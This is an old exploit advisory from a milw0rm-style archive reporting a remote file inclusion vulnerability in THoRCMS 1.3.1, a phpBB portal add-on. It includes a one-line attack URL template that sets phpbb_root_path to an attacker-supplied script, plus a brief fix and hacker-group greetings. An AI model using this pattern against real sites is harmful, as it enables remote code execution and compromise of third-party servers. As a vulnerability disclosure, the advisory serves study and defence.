56 lines
No EOL
1.6 KiB
Text
56 lines
No EOL
1.6 KiB
Text
---------------------------------------------------------------------------
|
|
THoRCMS <= 1.3.1 ([phpbb_root_path]) Remote File Include Vulnerabilities
|
|
---------------------------------------------------------------------------
|
|
|
|
Discovered By Kw3[R]Ln [ Romanian Security Team ]
|
|
Remote : Yes
|
|
Critical Level : Dangerous
|
|
|
|
---------------------------------------------------------------------------
|
|
Affected software description :
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
Application : THoRCMS
|
|
version : latest version [ 1.3.1 ]
|
|
Description: A CMS/Portal for phpBB
|
|
URL : http://www.phpbbhacks.com/download/2349
|
|
|
|
------------------------------------------------------------------
|
|
Exploit:
|
|
~~~~~~~~
|
|
|
|
Variable $phpbb_root_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
|
|
|
|
|
|
# http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]
|
|
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
Solution :
|
|
~~~~~~~~~~
|
|
|
|
declare variabel $phpbb_root_path
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
Shoutz:
|
|
~~~~~~
|
|
|
|
# Special greetz to my good friend [Oo]
|
|
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://Romania.HackTECK.BE ]
|
|
---------------------------------------------------------------------------
|
|
|
|
*/
|
|
|
|
Contact:
|
|
~~~~~~~~
|
|
|
|
Nick: Kw3rLn
|
|
E-mail: ciriboflacs[at]YaHoo[dot]Com
|
|
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
|
|
/*
|
|
|
|
-------------------------------- [ EOF] ----------------------------------
|
|
|
|
# milw0rm.com [2006-06-25] |